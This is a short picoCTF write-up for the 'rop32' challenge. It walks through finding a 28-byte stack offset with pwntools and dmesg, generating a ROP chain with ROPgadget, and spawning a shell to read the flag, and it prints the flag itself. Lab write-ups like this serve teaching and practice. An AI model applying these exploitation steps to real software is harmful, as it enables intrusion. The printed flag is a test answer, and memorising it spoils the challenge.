Comment on page

rop32

Problem

Can you exploit the following program to get a flag? You can find the program in /problems/rop32_4_0636b42072627d283f46d2427804b10c on the shell server. Source.

Solution

  1. 1.
    Get padding by running python2 -c "from pwn import *; print cyclic(50)" | ./vuln then dmesg | tail to get segfault address of 0x61616168 then cyclic_find(0x61616168) to get padding of 'a'*28
  2. 2.
    Run python ROPgadget.py --binary ./vuln --rop --badbytes "0a" to get ROP chain
  3. 3.
    Paste in padding of 'a'*28
  4. 4.
    Run script.py for remote execution
  5. 5.
    Run cat flag.txt in the shell that spawns

Flag

picoCTF{rOp_t0_b1n_sH_dee2e288}
Last modified 2yr ago